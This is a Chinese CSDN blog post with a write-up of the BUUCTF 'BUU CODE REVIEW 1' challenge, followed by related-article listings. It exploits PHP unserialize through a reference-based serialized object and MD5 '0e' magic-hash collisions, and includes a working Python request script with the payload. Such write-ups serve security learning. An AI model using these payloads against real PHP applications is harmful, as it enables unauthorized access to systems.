BUU CODE REVIEW 11反序列化

最新推荐文章于 2024-06-19 22:05:15 发布
最新推荐文章于 2024-06-19 22:05:15 发布
阅读量606 收藏 1
点赞数 3
分类专栏: BUU CTF 文章标签: html5 html css
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_50339832/article/details/120209167
版权

反序列化漏洞

进入靶机是这个样子

首先进行分析后

看最后一行那个函数unserialize,判断反序列化

 


 然后用post方法传obj变量,利用反序列化漏洞
这里要进行一个判断,就是buu类中的correct和input内容强相等,这里利用传引用的方法

 到http://c.runoob.com/compile/1运行下列代码

<?php
class BUU {
	public $correct="";
	public $input="";
}
$obj = new BUU();
$obj->input = $obj->correct;
echo serialize($obj);
?>

 编写脚本:

import requests

with requests.post(url="http://c934396b-xxxx-xxxx-xxxx-62bbeee14c98.node3.buuoj.cn/?pleaseget=1",
                   data={
                       "pleasepost": "2",
                       "md51": "QNKCDZO",
                       "md52": "240610708",
                       "obj": """O:3:"BUU":2:{s:7:"correct";s:0:"";s:5:"input";R:2;}"""
                   }
                   ) as req:
    print(req.text)
    with open("BUU CODE REVIEW 1.html", "w", encoding=req.apparent_encoding) as f:
        f.write(req.text)

 python运行:

 提交flag

 或者直接用Firefox自带的工具HackBar运行也可以

玉米同学
关注
  • 3
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 4
    评论
专栏目录
BUU 论坛的编辑器163Editor
09-21
"BUU 论坛的编辑器163Editor"是一个专为BUU论坛设计的文本编辑工具,它可能集成了丰富的富文本编辑功能,让用户在论坛发帖或回帖时可以方便地添加格式化文本、图片、链接等元素,提升交互体验。"DianUbb.rar"是这个...
POSN:POSN-BUU的源代码
04-01
7. **第三方库**:C++生态系统中有许多优秀的第三方库,如Boost、Eigen(用于线性代数计算)、Google Protocol Buffers(用于数据序列化)等,POSN-BUU可能依赖其中的一些进行开发。 8. **编译与构建工具**:项目...
BUU CODE REVIEW 1 1
shinygod的博客
03-30 1907
知识点:地址传值 法1: GET:?pleaseget=1 POST:pleasepost=2&md51=QNKCDZO&md52=240610708&obj=O:3:"BUU":2:{s:7:"correct";s:0:"";s:5:"input";R:2;} 原理:QNKCDZO和240610708MD5一下为0e开头,又是弱等于,0的n次方还是0 法2: GET:?pleaseget=1 POST:pleasepost=2&md51[]=1&md52[
BUUCTF/BUU CODE REVIEW 1
weixin_44041994的博客
03-20 764
2.判断GET参数pleaseget的值是否为1,POST参数pleasepost的值是否为2,参数md51和md52的值是否不等,经过md5加密后的参数md51和md52的值是否相等,这四个条件同时满足的话,对POST参数obj进行反序列化,而对象被反序列化时会调用__destruct方法。序列化的定义是:在计算机科学的数据处理中,是指将数据结构或对象状态转换成可取用格式(例如存成文件,存于缓冲,或经由网络中发送)以留待后续在相同或另一台计算机环境中,能恢复原先状态的过程。最后是进行反序列化obj
BUU CODE REVIEW 11 代码审计之反序列化知识
最新发布
weixin_42515203的博客
06-19 528
BUU CODE REVIEW 11 代码审计之反序列化知识
BUUCTF】basic web BUU CODE REVIEW 1 1(反序列化漏洞,传引用判断相等)
weixin_45844670的博客
10-12 3323
<?php /** * Created by PhpStorm. * User: jinzhao * Date: 2019/10/6 * Time: 8:04 PM */ highlight_file(__FILE__); class BUU { public $correct = ""; public $input = ""; public function __destruct() { try { $this->corre
反序列号漏洞学习!BUUCTF 极客PHP BUU CODE REVIEW 1 [网鼎杯 2020 青龙组]AreUSerialz
qq_58869808的博客
07-26 1622
反序列号漏洞学习!BUUCTF 极客PHP BUU CODE REVIEW 1 [网鼎杯 2020 青龙组]AreUSerialz
BUU CODE REVIEW 1
Jay17的博客
07-31 1331
BUU CODE REVIEW 1
Majin Buu Top HD Anime New Tabs Theme-crx插件
03-15
每次打开一个新选项卡,您将获得Majin Buu提供的不同高清壁纸 这个新主题包括时钟等等。 魔鬼的布欧(the devil,Buu),日本动漫《七龙珠》中的义与恶的角色,是《七龙珠》综合实力最强的BOSS。 这个名字来自电影...
BUU-Reveser-XMAN2018排位赛-easywasm(WebAssembly逆向分析)
05-26
通过反汇编,你可以查看每个函数的指令序列,理解其执行逻辑。 3. 分析控制流图(CFG):为了更好地理解程序流程,可以构建WASM函数的控制流图,帮助识别循环、分支和其他复杂结构。 4. 查找与JavaScript的交互点...
The HMT effects on the nucleon collective flows in BUU transport model
03-14
基于BUU模型利用集体流研究HMT效应,张芳,,基于半经典的BUU输运模型,我们利用中-质微分流、中子-质子流之差以及质子椭圆流研究了核内核子动量分布的高动量尾巴(HMT)效应。研
【CTF练习】BUU CODE REVIEW 1(代码审计)
m0_73866435的博客
01-31 1558
大致流程第一个if满足进入的条件为第二个if满足条件为。第三个if满足条件为。如果 1、2、3 条件都满足之后就会执行反序列化,通过POST 传参obj 执行,然后进入类函数类函数也有一个if满足条件为。但是correct 却是利用一个时间进行计算的值的base64 值。那么为什么执行反序列化就会自动进行类函数执行呢,我们来了解一下魔术方法。
BUUCTF basic BUU CODE REVIEW 1&sqli-labs &BUU UPLOAD COURSE 1
网安小趴菜
08-26 1058
BUUCTF basic BUU CODE REVIEW 1&sqli-labs&BUU UPLOAD COURSE 1 wp
CTF-PHP反序列化漏洞4-实例理解POP链(经典赛题)
Eason_LYC安全白帽子的成长博客
05-08 2417
悲观者预言失败,十言九中。乐观者创造奇迹,一次即可。一个人的价值,在于他所拥有的。可以不学无术,但不能一无所有!关注WEB安全、网络攻防。我的专栏文章知识点全面细致,逻辑清晰、结合实战,让你在学习路上事半功倍,少走弯路!追求技术至上,这是我们理想中的极乐世界~(关注我即可加入社区)本专栏打破以往CTF速成或就题论题模式。采用。让刚接触CTF的读者真正掌握CTF中各类型知识点,为后续自学或快速刷题备赛,打下坚实的基础~
CTF-反序列化
qq_61774705的博客
08-15 4392
反序列化
BUU CODE REVIEW
Sk1y的博客
08-23 675
代码审计,php反序列化
buu upload-labs 11
09-19
引用、和是关于文件上传功能的源代码。这些源代码都是用于处理上传文件的功能,但每个源代码都有一些细微的差异。比如,引用和使用了文件的扩展名来确定文件类型,而引用则使用了文件的MIME类型来确定文件类型。 不论是哪个源代码,它们都首先检查上传文件的类型是否符合要求,然后将文件移动到指定的路径。如果移动文件成功,则标记$is_upload为true,否则将相应的错误信息存储在$msg变量中。 在回答完问题后,我会为您提供一些相关的问题。
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值